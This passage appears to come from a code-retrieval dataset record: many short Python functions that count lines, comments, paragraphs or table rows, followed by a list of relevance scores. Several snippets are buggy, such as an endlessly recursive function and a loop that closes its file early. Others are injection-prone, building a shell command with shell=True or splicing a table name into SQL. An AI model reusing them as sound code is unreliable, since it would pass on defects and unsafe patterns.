in line:\n count += 1\n if count == 0:\n count = 1\n return count\n #return line.count('.')\n #else:\n #return 1", "def get_line_count(blob):\n return len(blob.split('\\n'))", "def analyzeCppCode(self, sourceFile):\n numLines = 0 # Number of lines of code\n numComments = 0 # Number of comments in the code\n\n f=self.openFile(sourceFile)\n for line in f:\n numLines += 1;\n loc = 0\n while (loc != -1): #count the # of times the '/*' characters appears\n loc = line.find(\"#\", loc)\n if (loc != -1):\n loc += 1\n numComments += 1\n \n loc = 0\n loc = line.find('//', loc) #count the # of times the '//' characters appears\n if (loc != -1):\n loc += 1\n numComments += 1\n \n f.close()\n return numLines, numComments", "def line_count(fname):\n return int(call(['wc', '-l', fname]).strip().split()[0])", "def line_count(file):\n with open(file, \"r\") as f:\n return sum(1 for line in f)", "def number_of_lines(filename=\"\"):\n num_lines = 0\n with open(filename, encoding=\"utf-8\") as myFile:\n return myFile.read().count('\\n')", "def CountLineNumber(filename):\n\n fp = open(os.path.abspath(filename), \"r\");\n lines = 0\n for line in fp.readlines():\n lines = lines + 1\n fp.close()\n return lines", "def lineNumber(self):\n if self.__lineNumber is None:\n self.__lineNumber = self.__source.count(\"\\n\", 0, self.__offset) + 1\n\n return self.__lineNumber", "def no_of_lines():\n return render_template(\"no_of_lines.html\", no_of_lines=no_of_lines())", "def count_lines(file_uri):\n\n with open(file_uri) as file_obj:\n for i, line in enumerate(file_obj):\n pass\n num_lines = i + 1\n return num_lines", "def get_number_lines(running_reward_file, running_loss_file, action_count_file):\n if Path(running_reward_file).exists():\n data = np.loadtxt(running_reward_file).reshape(-1,2)\n return data.shape[0]\n if Path(running_loss_file).exists():\n data = np.loadtxt(running_loss_file).reshape(-1,2)\n return data.shape[0]\n if Path(action_count_file).exists():\n data = np.loadtxt(action_count_file).reshape(-1,2)\n return data.shape[0]\n raise NameError(\"No files to count lines\")", "def countLines(file_name, start, end):\r\n\r\n with open(file_name, \"r\") as file:\r\n counter_lines = 0\r\n\r\n for line in islice(file, start, end):\r\n counter_lines += 1\r\n\r\n return counter_lines", "def len(self):\n\t\t\n\t\treturn len(self.line)", "def lines_processed(self) -> int:\n with self.lock:\n return self._lines_processed", "def word_count(self):\n print(self.words())\n return len(self.words())\n #count = 0\n #for lines in self.lines:\n # line = lines.strip(os.linesep)\n # wordslst = line.split()\n # count += len(wordslst)\n #return count\n #joined_string = ''.join(self.lines)\n #for word in joined_string:\n # if word != ' ' and word != '\\n' and word != '\\t':\n # count += 1\n #print('READ ME ––––––––––', self.lines)\n #print(joined_string)\n #print(line)\n #print(wordslst)\n #print(count)", "def fileLineCount(fPath):\n\twith open(fPath) as f:\n\t\tfor i, li in enumerate(f):\n\t\t\tpass\n\treturn (i + 1)", "def _loc(self) -> int:\n return len(self.lines)", "def header_len(self):\n if self.num_lines_header is None:\n Nheader = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] == self.header_char) or (\n l == \"\\n\"\n ):\n Nheader += 1\n else:\n break\n\n return Nheader\n else:\n return self.num_lines_header", "def comments(self):\n lineno = 0\n novermin = set()\n src = self.__source\n if type(src) == bytes:\n src = 
src.decode(errors=\"ignore\")\n for line in src.splitlines():\n lineno += 1\n line = line.strip()\n m = RE_COMMENT.match(line)\n if m is not None:\n comment = m.group(2).strip()\n if comment == \"novermin\" or comment == \"novm\":\n # Ignore if it is inside another comment, like: `# test: # novm`\n if m.start(0) < m.start(1) and m.group(0).strip().startswith(\"#\"):\n continue\n # Associate with next line if the comment is \"alone\" on a line, i.e. '#' starts the line.\n novermin.add(lineno + 1 if m.start(1) == 0 else lineno)\n return novermin", "def num_bytes_per_line(self):\n return self._num_bytes_per_line", "def number_of_lines(filename=\"\"):\n count = 0\n with open(filename) as f:\n for lines in f:\n count += 1\n return (count)", "def number_of_lines(filename=\"\"):\n c = 0\n with open(filename) as f:\n for r in f:\n c += 1\n return(c)", "def countlines(fn):\n with open(fn, 'rb') as f:\n bufgen = takewhile(\n lambda x: x, (f.read(1024 * 1024) for _ in repeat(None)))\n ln = sum(buf.count(b'\\n') for buf in bufgen)\n return ln", "def get_table_nb_lines(self, table):\n sql = \"SELECT COUNT(*) FROM \" + table + \";\"\n cur = self._connection.cursor()\n cur.execute(sql)\n res = cur.fetchall()\n cur.close()\n return res[0][0]", "def test_counts(self):\n lines, words, chars = analyze_text(self.filename)\n self.assertEqual(lines, 4)\n self.assertEqual(words, 8)\n self.assertEqual(chars, 36)", "def count_lines(filename):\r\n with open(filename, 'rb') as f:\r\n return sum(1 for line in f)", "def get_file_line_count(a_file):\r\n count = -1\r\n try:\r\n for count, line in enumerate(open(a_file, \"rU\")):\r\n pass\r\n except IOError:\r\n pass\r\n count += 1\r\n return count", "def get_file_line_count(a_file):\r\n count = -1\r\n try:\r\n for count, line in enumerate(open(a_file, \"rU\")):\r\n pass\r\n except IOError:\r\n pass\r\n count += 1\r\n return count", "def num_lines(file_name):\n with open(file_name) as file:\n for i, line in enumerate(file):\n pass\n return i + 1", "def count_lines(stream):\n return len(stream.readlines())", "def data_len(self):\n Nrows_data = 0\n with self._compression_safe_file_opener(self.input_fname, \"r\") as f:\n for i, l in enumerate(f):\n if (l[0 : len(self.header_char)] != self.header_char) and (l != \"\\n\"):\n Nrows_data += 1\n return Nrows_data", "def count_comments(self):\n return self.run_query(f\"count({self.r}/comment)\")", "def retrieve_info():\n try:\n a = line_count()\n b = char_count()\n except:\n print(\"That didn't work, are you sure you defined a valid filename? 
Try using 'file <your filename>'\")\n return\n print(\"There are {0} lines in your file, for a total of {1} characters\".format(a,b))", "def count_lines(file_obj):\n for idx, line in enumerate(file_obj):\n pass\n file_obj.seek(0)\n return idx + 1", "def line_length(self, dLine = 0):\n return self.buffer.line_length(self.line + dLine)", "def count_LOC(path):\n re_empty = re.compile(r\"[\\s]*(#|\\n|\\\"\\\"\\\")\")\n re_for = re.compile(r\"for.*in\")\n re_lambda = re.compile(r\"lambda\")\n re_if = re.compile(r\"if.*:\")\n re_def = re.compile(r\"def (?P<fname>\\w+)\\(\")\n\n total_LOC, indent_level = 0, 0\n cur_part = None\n parts = defaultdict(int)\n\n with open(path, 'r') as _file:\n for line in filter(lambda l : not re_empty.match(l), _file):\n\n extra = len( re_for.findall(line) ) - 1 + len( re_lambda.findall(line) ) - 1 + len( re_if.findall(line) ) -1\n\n if extra < 0: extra = 0\n\n total_LOC += 1 + extra\n if cur_part:\n parts[cur_part] += 1 + extra\n\n defs = re_def.search(line)\n if defs:\n cur_part = defs.groupdict()['fname']\n indent_level = first_non_whitespace(line)\n\n cur_indent = first_non_whitespace(line)\n if cur_indent < indent_level:\n cur_part = None\n indent_level = cur_indent\n\n return(total_LOC, parts)", "def contentcheck_numerical():\n filename = \"Analysis.txt\"\n temp_line = \"\"\n count = 0\n for line in open(filename, 'r'):\n temp_line = temp_line + line\n if \"DATA INFORMATION\" in temp_line:\n count = count + 1\n if \"MEAN, MEDIAN AND MODE:\" in temp_line:\n count = count + 1\n if \"Correlation\" in temp_line:\n count = count + 1\n if \"Normality Tests\" in temp_line:\n count = count + 1\n return count", "def count_lines(filename):\n with open(filename, 'rb') as f:\n return sum(1 for line in f)", "def len(self, table):\n return self.get_table_nb_lines(table)", "def checkEachLineCount(mat):\n n = sum(mat[0])\n \n assert all(sum(line) == n for line in mat[1:]), \"Line count != %d (n value).\" % n\n return n", "def number_of_lines(filename=\"\"):\n with open(filename, encoding=\"utf-8\") as file:\n text = file.readlines()\n return len(text)", "def checkEachLineCount(mat):\n n = sum(mat[0])\n\n assert all(sum(line) == n for line in mat[1:]), \"Line count != %d (n value).\" % n\n return n", "def number_of_lines(filename=\"\"):\n with open(filename, encoding='UTF8') as a_file:\n\n lineNum = 0\n\n for eachLine in a_file:\n lineNum += 1\n return lineNum", "def file_len(full_path):\n f = open(full_path)\n nr_of_lines = sum(1 for line in f)\n f.close()\n return nr_of_lines", "def number_of_lines(filename=\"\"):\n n = 0\n if filename == \"\":\n return n\n with open(filename, \"r\") as f:\n for line in f:\n n = n + 1\n return n", "def N_POINTS(self) -> int:\n try:\n with self.fs.open(\n self.get_url().replace(\".\" + self.erddap.response, \".ncHeader\")\n ) as of:\n ncHeader = of.read().decode(\"utf-8\")\n lines = [line for line in ncHeader.splitlines() if \"row = \" in line][0]\n return int(lines.split(\"=\")[1].split(\";\")[0])\n except Exception:\n pass", "def _chunklines(self):\r\n text = self.textwnd.toPlainText()\r\n lines_in_chunk = len(text.split(\"\\n\"))\r\n logger.debug(\"Lines in chunk: {}\".format(lines_in_chunk))\r\n return lines_in_chunk", "def numLinesInFile(fname):\n with open(fname, 'rb') as f:\n for i, l in enumerate(f):\n pass\n return i + 1", "def count_total_line():\n count = 0\n file_count = 0\n for filename in os.listdir('.'):\n if filename.endswith(\".json\"):\n file_count += 1\n with open(filename, 'r', encoding='utf8') as f:\n for line in f:\n 
count += 1\n print(\"There are {0} lines in {1} json files\".format(count, file_count))", "def count_len(self):\n total = 0\n for filename in self.filenames:\n f = open(os.path.join(self.directory, filename))\n line_count = 0\n for _ in f:\n line_count += 1\n if line_count < self.window_size:\n continue\n else:\n total += line_count - self.window_size + 1\n return total", "def number_of_lines(filename=\"\"):\n n_lines = 0\n with open(filename, encoding='utf-8', mode='r') as file:\n for lines in file:\n n_lines += 1\n return n_lines", "def number_of_lines(filename=\"\"):\n counter = 0\n with open(filename, \"r\") as my_file:\n for line in my_file:\n counter += 1\n my_file.close()\n return (counter)", "def test_makefile_total_lines(cookies, context, black, pipenv, mypy):\n ctx = context(black=black, pipenv=pipenv, mypy=mypy)\n result = cookies.bake(extra_context=ctx)\n\n makefile = result.project.join('Makefile')\n lines = makefile.readlines(cr=False)\n\n expected = 27\n expected -= 2 if black == 'n' else 0\n expected -= 1 if mypy == 'do not use' else 0\n assert len(lines) == expected", "def number_of_lines(filename=\"\"):\n\n number_lines = 0\n with open(filename) as file_opened:\n for line in file_opened:\n number_lines += 1\n return number_lines", "def paragraph_count(self, doc):\n\n paragraphs = doc.split(\"\\n\\n\")\n # remove the empty string\n return len([paragraph for paragraph in paragraphs if paragraph])", "def get_number_of_paragraph(self):\n file_to_read = f'{self.path}/{self.filename}'\n file = open(file_to_read, 'r', encoding='utf-8')\n string_to_match = '<p>'\n count = 0\n for line in file:\n if string_to_match in line:\n count += 1\n sqlite_for_ht.CreateTable.update_table(f_1, self.filename, 'number_of_paragraph', count)\n print(datetime.now(), '-', 'number_of_paragraph for', self.filename, 'calculated =', count)\n return None", "def number_of_lines(filename=\"\"):\n with open(filename, encoding='utf-8') as myFile:\n return sum([1 for line in myFile])", "def gather_counts(directory):\n counts_un = defaultdict(int)\n counts_bi = defaultdict(int)\n counts_tri = defaultdict(int)\n prev_prev = \"<s>\"\n prev = \"<s>\"\n for filename in os.listdir(f\"./{directory}\"):\n if \".DS_Store\" in filename:\n continue\n with open(f\"./{directory}/{filename}\", \"r\") as f:\n for line in f:\n line = line.strip()\n if len(line) == 0:\n continue\n counts_un[line+\"\\n\"] += 1\n counts_bi[prev+\"\\n\"+line+\"\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\"+line+\"\\n\"] += 1\n prev_prev = prev\n prev = line\n counts_un[\"</s>\\n\"] += 2\n counts_bi[\"</s>\\n</s>\\n\"] += 1\n counts_bi[prev+\"\\n\"+\"</s>\\n\"] += 1\n counts_tri[prev_prev+\"\\n\"+prev+\"\\n\" + \"</s>\\n\"] += 1\n counts_tri[prev+\"\\n</s>\\n</s>\\n\"] += 1\n return counts_un, counts_bi, counts_tri", "def count_lines(inFile, outFile):\n \n bodyLines = []\n # Begin iteratin lines, starting at line 'lineNum'\n for line_ in inFile:\n line_ = line_.rstrip('\\n').strip()\n if (not line_) or (line_[0] == '!'):\n continue\n elif line_.upper() in cases:\n print(\"Error: encountered new case before end of last.\"\n \"\\n Have you forgotten an 'END'?\", file=outFile)\n sys.exit()\n elif line_.upper() == \"END\":\n return bodyLines\n else:\n bodyLines.append(line_)", "def total_rows(self):\n self._fetch_if_needed()\n # reduce case, count number of lines\n if self._total_rows is None:\n return self.count()\n return self._total_rows", "def num_lines(fname):\n with open(fname) as f:\n for i, l in enumerate(f):\n pass\n return( i + 1 
)", "def num_items(self):\n num_items = 0\n for line in self.lines.all():\n num_items += line.quantity\n return num_items", "def get_line_no(obj):\n try:\n lineno = getsourcelines(obj)[1]\n except:\n # no code found\n lineno = None\n return lineno", "def number_of_lines(filename=\"\"):\n line_number = 0\n with open(filename, encoding='UTF8') as f:\n for line in f:\n line_number += 1\n return line_number", "def parseCommentsTotalCount(data):\n p = re.compile(r\"\\d+ Reviews\")\n\n for line in data:\n line = line.replace(\",\", \"\")\n match = re.search(p, line)\n if match != None:\n getNmbr = match.group().split(\" \")\n return int(getNmbr[0])\n return -1", "def count_locs(file_type, comment_pattern):\n find = \"find . -name '*.{0}' -print0\".format(file_type)\n sed_pattern = \"'/^\\s*{0}/d;/^\\s*$/d'\".format(comment_pattern)\n\n cmd = \"{0} | xargs -0 sed {1} | wc -l\".format(find, sed_pattern)\n\n return check_output(cmd, shell = True).decode('utf-8').replace('\\n', '')", "def coverage_stats(self) -> (int, int):\n covered = sum(1 for line in self.source_code if line.coverage > 0)\n lines = sum(1 for line in self.source_code if line.coverage >= 0)\n return (covered, lines)", "def count_tests(infile):\n\n ntests = 0\n with open(infile, \"r\") as ff:\n for line in ff:\n if line.strip(): # Jump empty lines\n if summary in line:\n # Count failed tests for each start of file\n ntests += 1\n return ntests", "def estimate_lines(self):\r\n logger.debug(\"estimate Lines\")\r\n self.filesize = Path(self.fileName).stat().st_size\r\n text = self.textwnd.toPlainText()\r\n linetext = text.split(\"\\n\")[1] + \"\\\\r\\\\n\"\r\n self.linesize = len(linetext.encode('utf-8'))\r\n self.estimated_lines = self.filesize // self.linesize\r\n logger.debug(\"Estimate Lines: {}\".format(self.estimated_lines))\r\n self.statusBar.showMessage(f\"Estimated lines: {self.estimated_lines}\")", "def ignore_newline(self, t):\n self.lineno += t.value.count('\\n')", "def bufcount(filename):\n\timport gzip\n\tif filename.split('.')[-1] in ['gz','gzip']: f = gzip.open(filename)\n\telse: f = open(filename)\n\tlines = 0\n\tbuf_size = 1024 * 1024\n\tread_f = f.read # loop optimization\n\t\n\tbuf = read_f(buf_size)\n\twhile buf:\n\t\tlines += buf.count('\\n')\n\t\tbuf = read_f(buf_size)\n\t\tf.close\n\treturn lines", "def extract_docstring_linenum(node: ast.Str) -> int:\n doc = node.s\n lineno = node.lineno\n if _string_lineno_is_end:\n # In older CPython versions, the AST only tells us the end line\n # number and we must approximate the start line number.\n # This approximation is correct if the docstring does not contain\n # explicit newlines ('\\n') or joined lines ('\\' at end of line).\n lineno -= doc.count('\\n')\n\n # Leading blank lines are stripped by cleandoc(), so we must\n # return the line number of the first non-blank line.\n for ch in doc:\n if ch == '\\n':\n lineno += 1\n elif not ch.isspace():\n break\n \n return lineno", "def get_n_lines(file):\n return sum(1 for _ in open(file))", "def line(self) -> int:", "def count_lines(filename):\n with open(filename, 'r', encoding='utf-8') as file:\n lines_count = int()\n for line in file:\n lines_count += 1\n info_tuple = (filename, lines_count)\n return info_tuple", "def getNumRows(self) -> int:\n ...", "def indentsize(line):\r\n expline = string.expandtabs(line)\r\n return len(expline) - len(string.lstrip(expline))", "def count_indents(text):\n counts = 0\n for char in text:\n if char.isspace() and char != \"\\t\" and char !=\"\\n\":\n counts += 1\n elif 
char.isalpha():\n break\n return counts", "def totallines(self):\n return self._totallines", "def peek_length(self) -> Optional[int]:\n LINE_CUTOFF = 10_000\n count = 0\n with open(self.path, mode='r') as f:\n for _ in f:\n count += 1\n\n return count", "def analyzePythonCode(self, sourceFile):\n numLines = 0 # Number of lines of code\n numDocStr = 0 # Number of doc strings in code\n numComments = 0 # Number of comments in the code\n numDefs = 0 # Number of functions\n numClasses = 0 # Number of classes\n f=self.openFile(sourceFile)\n for line in f:\n numLines += 1;\n loc = 0\n while (loc != -1): #count the # of times the '#' characters appears\n loc = line.find(\"#\", loc)\n if (loc != -1):\n loc += 1\n numComments += 1\n loc = 0\n while (loc != -1):\n loc = line.find('\"#', loc) #discount the # of times the '#' char appears as the 1st char in double quotes (skip hex constants)\n if (loc != -1):\n loc += 1\n numComments -= 1\n loc = 0\n while (loc != -1):\n loc = line.find(\"'#\", loc) #discount the # of times the '#' char appears as the 1st char in single quotes (skip hex constants)\n if (loc != -1):\n loc += 1\n numComments -= 1\n loc = 0\n while (loc != -1): #count the # of ''' found\n loc = line.find(\"'''\", loc)\n if (loc != -1):\n loc += 1\n numDocStr += 1\n loc = 0\n while (loc != -1): #count the # of \"\"\" found\n loc = line.find('\"\"\"', loc)\n if (loc != -1):\n loc += 1\n numDocStr += 1\n\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES) != '':\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES).split()[0] == 'def': #count # of defs\n numDefs += 1\n if line.strip(AutoGrader.Const.PYTHON_WHITE_SPACES).split()[0] == 'class': #count # of classes\n numClasses += 1\n \n f.close()\n numDocStr /= 2 #assume that the \"\"\" and ''' chars appear in pairs \n return numLines, numDocStr, numComments, numDefs, numClasses", "def num_lineages(self, t):\n return self._ll_tree.get_num_lineages(t)", "def calc_lines(self):\n line = []\n for msg in self.message_log:\n msg = msg['msg']\n if '\\n' not in msg:\n line.append(math.ceil((len(msg) + 18) / self.w))\n else:\n msg = msg.split('\\n')\n total = 0\n for i in msg:\n total += math.ceil((len(i) + 18) / self.w)\n line.append(total)\n return line", "def find_line_offsets(self):\n # line 0 doesn't exist; line 1 starts at char offset 0.\n self.line_offsets = [None, 0]\n # Find all newlines in `text`, and add an entry to\n # line_offsets for each one.\n pos = self.text.find('\\n')\n while pos != -1:\n self.line_offsets.append(pos+1)\n pos = self.text.find('\\n', pos+1)\n # Add a final entry, marking the end of the string.\n self.line_offsets.append(len(self.text))" ]
[ "0.7124473", "0.7070284", "0.7070284", "0.70378745", "0.68012744", "0.6775583", "0.6723244", "0.66507286", "0.6617019", "0.6589754", "0.6558442", "0.64918953", "0.6448747", "0.6290716", "0.6276412", "0.62674546", "0.62459767", "0.6210425", "0.61959755", "0.61630034", "0.607485", "0.60718256", "0.60165143", "0.60162073", "0.60037184", "0.59883296", "0.5987761", "0.59413785", "0.5936182", "0.59178585", "0.5916363", "0.5916251", "0.59111917", "0.58982295", "0.5852242", "0.5851282", "0.58498377", "0.5844391", "0.5810414", "0.58063877", "0.57984734", "0.57945955", "0.5792947", "0.5784022", "0.5784022", "0.5773813", "0.5773533", "0.5770539", "0.5755285", "0.57249373", "0.5718683", "0.57129776", "0.5712446", "0.57076025", "0.570337", "0.5699872", "0.569652", "0.569636", "0.5692555", "0.56902367", "0.568061", "0.56565064", "0.5653833", "0.5632383", "0.56285274", "0.5625233", "0.5623037", "0.56146735", "0.56099117", "0.5609803", "0.5602524", "0.55954427", "0.5585437", "0.5577345", "0.5570784", "0.55703294", "0.55693257", "0.556186", "0.55543566", "0.55497676", "0.5544582", "0.5542266", "0.5537529", "0.55228424", "0.5513554", "0.55054975", "0.5502461", "0.5500896", "0.5490819", "0.54755926", "0.54749256", "0.54647994", "0.54591167", "0.54552305", "0.5451477", "0.54513496", "0.5449478", "0.5444156", "0.54259574", "0.54147977", "0.54108155" ]
0.0
-1
Returns the total, nonblank and net loc for all the python files in a directory
def get_folder_total(path): files = os.listdir(path) pythonfiles = ['%s/%s' % (path, filename) for filename in files if filename[-3:] == '.py'] total = { 'net': 0, 'total': 0, 'nonblank': 0, 'num_inputs':0 } for filename in pythonfiles: with open(filename, 'r') as thisfile: blob = thisfile.read() # print filename thisloc = loc(blob) for k, v in thisloc.items(): total[k] += v return total
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def loc():\n file_types = (\n ['Python', 'py', '#']\n )\n\n click.echo('Lines of code\\n-------------')\n\n click.echo(\"{0}: {1}\".format(file_types[0], count_locs(file_types[1],\n file_types[2])))\n\n return None", "def analyze_files(self):\n for file in os.listdir(self.directory):\n if file[-3:] == (\".py\"):\n fopen = open(os.path.join(self.directory, file), \"r\")\n try:\n if not (py_file := fopen):\n raise FileNotFoundError\n\n with py_file: # close file after opening\n class_count: int = 0\n fun_count: int = 0\n l_count: int = 0\n ch_count: int = 0\n for line in py_file: # calculate values for the file\n if line.strip().startswith(\"class \"):\n class_count = class_count+1\n elif line.strip().startswith(\"def \"):\n fun_count = fun_count+1\n\n l_count = l_count+1\n ch_count = ch_count+len(line)\n\n self.files_summary[str(os.path.join(self.directory, file))] = {\"class\": class_count, \"function\": fun_count, \"line\": l_count,\n \"char\": ch_count}\n except FileNotFoundError:\n print(f\"File {py_file} is not found or can not be opened\")\n fopen.close()", "def checkSum():\n val = 0\n for ext in EXTENSION_GLOBS:\n for f in glob.glob (ext):\n stats = os.stat(f)\n val += stats[stat.ST_SIZE] + stats[stat.ST_MTIME]\n return val", "def fileCounter(directory):", "def getFileLoc(self):\n\t\trval = []\n\t\tlocalVolTbl = self.file_loc['localVolTbl']\n\t\tnetVolTbl = self.file_loc['netVolTbl']\n\t\t\n\t\tif localVolTbl != None:\n\t\t\trval.extend((FILE_LOC[0],\n\t\t\t\tFILE_LOC[1] + self.file_loc['basePathname'] + \\\n\t\t\t\t\"\\\\\" + self.file_loc['remainPathname']))\n\t\n\t\t\tfor ii in range(len(VOL_TYPE)):\n\t\t\t\tif (self.header['file_attributes'] & (2 ** (ii + 1))) > 0:\n\t\t\t\t\trval.append(VOL_TYPE[ii])\n\t\t\t\t\n\t\t\trval.extend((FILE_LOC[2] + localVolTbl['volume_label'],\n\t\t\t\tFILE_LOC[3] + str(localVolTbl['vol_serial_num'])))\t\t\n\t\n\t\tif netVolTbl != None:\n\t\t\trval.append(FILE_LOC[4] + netVolTbl['net_sharename'] + \\\n\t\t\t\t\"\\\\\" + self.file_loc['remainPathname'])\n\t\treturn rval", "def check_dir(self):\n if not Path(self.src_dir).exists():\n print('No such directory found:', self.src_dir)\n return\n\n nc_all = self.src_dir + \"/*.nc*\"\n if len(glob.glob(nc_all)) == 0:\n print('No NetCDF files found in:', self.src_dir)\n return\n\n return nc_all", "def analyze_files(self):\n num_file = 0\n results = dict()\n try:\n list_files = os.listdir(self.directory)\n except FileNotFoundError:\n raise FileNotFoundError(\"Can't find any file\")\n else:\n for file in list_files: #looping the files in the directly\n num_file += 1\n if file.endswith(\".py\"): # Looking for files that end with .py\n try:\n fp = open(os.path.join(self.directory, file), \"r\")\n except FileNotFoundError:\n raise FileNotFoundError(f\"Can't open file no {num_file}\")\n else:\n with fp:\n c_total = 0 #Total length of Characters for the entire file\n filename = file # Storing the file name\n t_line = 0 # Getting the total number of line\n t_def = 0 #Getting the total number of functions\n t_class = 0 #Getting the total number of classes\n \n for line in fp:\n t_line += 1 # Counting each line\n t_char = len(line) #Length of characters for each line\n n_line = line.strip() # gets rid of white spaces and new lines\n c_total += t_char # adding each total char in line to the pervious total char in line\n if n_line.startswith(\"def \"): \n t_def += 1 \n elif n_line.startswith(\"class \"):\n t_class += 1\n results[filename] = {'class': t_class, 'function': t_def, 'line': t_line, 'char': c_total }\n 
return results", "def test_case_6():\n print(\"*********Test_case_6***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir', 't1.c')\n result = find_files('.c', path)\n print(result)", "def test_case_5():\n print(\"*********Test_case_5***********\")\n result = find_files('.c', \"\")\n print(result)", "def execute(root_dir):\n \n \n #Getting all the file recursively that py files\n lenght=[]\n libraries=[]\n nesting_factors=[]\n param_count=[]\n total_var=[]\n duplicate_for_the_repo=[]\n average_nesting_factor=0\n average_param=0\n code_duplication=0\n avg_var=0\n \n k=root_dir.rsplit('-')\n n=k[0]\n m=k[-1]\n \n urls=[ repo for repo in repo_list if n and m in repo ]\n if urls:\n url=urls[0]\n else:\n url=root_dir\n\n for filename in glob.iglob(root_dir + '/**/*.py', recursive=True):\n #filename=filename.replace(\" \", \"\\\\ \")\n filename=str_to_raw(filename)\n try: \n count=pygount.source_analysis(filename, 'pygount') # counting the line of codes for the py files\n l=count.code\n lenght.append(l)\n library =imported_module(filename)\n for lib in library:\n libraries.append(lib)\n deg_list=nesting_factor(for_loop_position(filename)) \n for deg in deg_list:\n nesting_factors.append(deg)\n\n\n\n for param in parameter_count(filename):\n param_count.append(param)\n for var in variable_count(filename):\n total_var.append(var)\n duplicate_for_the_repo.append(duplicated_line(filename))\n except Exception as e:\n print(\"type error: \" + str(e))\n print(filename)\n \n \n if len(nesting_factors) !=0: \n average_nesting_factor= np.mean(nesting_factors)\n if param_count: \n average_param= np.mean(param_count) \n libraries=unique(libraries)\n repo_count=sum(lenght)\n if total_var:\n avg_var=np.mean(total_var)\n if repo_count and duplicate_for_the_repo:\n code_duplication=(sum(duplicate_for_the_repo)/repo_count)*100\n \n return {'repository_url': url, \n 'number of lines': repo_count, \n 'libraries': libraries,\n 'nesting factor': average_nesting_factor,\n 'code duplication': code_duplication,\n 'average parameters':average_param,\n 'average variables':avg_var}", "def _get_run_info(self, path, creation_date):\n total = 0\n try:\n for entry in os.scandir(path):\n # Only evaluates size of files and not folders inside raw/proc\n if entry.is_file():\n # if it's a file, use stat() function\n total += entry.stat().st_size\n\n except NotADirectoryError:\n # if `path` isn't a directory, get the file size then\n total = os.path.getsize(path)\n except PermissionError:\n # if for whatever reason we can't open the folder, return 0\n return 0\n\n if os.path.isdir(path):\n validator = RunValidator(path)\n elif path.endswith(\".h5\"):\n validator = FileValidator(H5File(path).files[0])\n else:\n return 0\n\n try:\n validator.run_checks()\n except Exception:\n pass\n return total, str(ValidationError(validator.problems))", "def test_case_3():\n print(\"*********Test_case_3***********\")\n result = find_files('.c', None)\n print(result)", "def count_LOC(path):\n re_empty = re.compile(r\"[\\s]*(#|\\n|\\\"\\\"\\\")\")\n re_for = re.compile(r\"for.*in\")\n re_lambda = re.compile(r\"lambda\")\n re_if = re.compile(r\"if.*:\")\n re_def = re.compile(r\"def (?P<fname>\\w+)\\(\")\n\n total_LOC, indent_level = 0, 0\n cur_part = None\n parts = defaultdict(int)\n\n with open(path, 'r') as _file:\n for line in filter(lambda l : not re_empty.match(l), _file):\n\n extra = len( re_for.findall(line) ) - 1 + len( re_lambda.findall(line) ) - 1 + len( re_if.findall(line) ) -1\n\n if extra < 0: extra = 0\n\n total_LOC += 
1 + extra\n if cur_part:\n parts[cur_part] += 1 + extra\n\n defs = re_def.search(line)\n if defs:\n cur_part = defs.groupdict()['fname']\n indent_level = first_non_whitespace(line)\n\n cur_indent = first_non_whitespace(line)\n if cur_indent < indent_level:\n cur_part = None\n indent_level = cur_indent\n\n return(total_LOC, parts)", "def getBaseSrcFile(self) -> List[int]:\n ...", "def checkSumHelper(arg, dirname, fnames):\n val = 0\n files = [name for name in fnames if os.path.splitext(name)[1] in EXTENSIONS]\n for file in files:\n absFile = os.path.join(dirname,file)\n try:\n stats = os.stat(absFile)\n except OSError,e:\n # This is to skip over temporary files or files\n # nosy doesn't have permission to access\n # print \"Nosy: skipping file %s with error %s\"%(absFile,e)\n continue\n val += stats[stat.ST_SIZE] + stats[stat.ST_MTIME]\n arg.append(val)\n return", "def test_case_1():\n print(\"*********Test_case_1***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files('.c', path)\n for file in result:\n print(file)", "def test_case_4():\n print(\"*********Test_case_4***********\")\n path = os.path.join(os.path.dirname(__file__), 'testdir')\n result = find_files('', path)\n for file in result:\n print(file)", "def print_local_output_files_stats():\n print \"\\n\\nFILES CREATED:\"\n for filename in os.listdir('../output'):\n filesize = os.path.getsize('../output/' + filename)\n print str(filesize) + \"\\t\" + filename\n print \"\\n\"", "def get_amount_of_data(directory: str):\n size = sum([os.path.getsize(os.path.join(directory, item)) for item in os.listdir(directory) if os.path.isfile(os.path.join(directory, item))])\n print(size)\n return size", "def readfiles(self, dirname , search , notsearch = 'rgvar' , notdir = 'xyvwa'):\n print('We are in the following directory: %s looking for files that contain %s and not %s' %(dirname, search , notsearch))\n dirlist = os.listdir(dirname)\n for filep in dirlist:\n filep = os.path.join(dirname,filep) \n if os.path.islink(filep):\n pass\n elif os.path.isdir(filep):\n m = re.search(notdir , filep)\n if m is None:\n self.readfiles(filep , search, notsearch = notsearch, notdir = notdir )\n elif os.path.isfile(filep) and '.dat' in filep: \n nm = re.search(notsearch, filep)\n m = re.search(search , filep)\n #print m , nm\n if m is not None and nm is None:\n self.plotfiles.append(filep)\n else:\n pass", "def my_root_listdir(root_dir):\n root_listdir = [\n images_dir\n for images_dir in os.listdir(root_dir)\n if not any(\n characters in images_dir for characters in [\".\", \"test\", \"train\", \"valid\"]\n )\n ]\n summ = 0\n for images_dir in root_listdir:\n summ += len(os.listdir(root_dir + \"/\" + images_dir)) / 2 - 2\n print(\"Sum of images in directories: \", int(summ))\n return root_listdir", "def retrive_scanning_scheme(self, Nest_data_directory, file_keyword = 'PMT_0Zmax'):\r\n fileNameList = []\r\n# ImgSequenceNum = 0\r\n for file in os.listdir(Nest_data_directory):\r\n if file_keyword in file:\r\n fileNameList.append(file)\r\n \r\n RoundNumberList = []\r\n CoordinatesList = []\r\n for eachfilename in fileNameList:\r\n # Get how many rounds are there\r\n try:\r\n RoundNumberList.append(eachfilename[eachfilename.index('Round'):eachfilename.index('_Grid')])\r\n except:\r\n RoundNumberList.append(eachfilename[eachfilename.index('Round'):eachfilename.index('_Coord')])\r\n \r\n RoundNumberList = list(dict.fromkeys(RoundNumberList)) # Remove Duplicates\r\n \r\n 
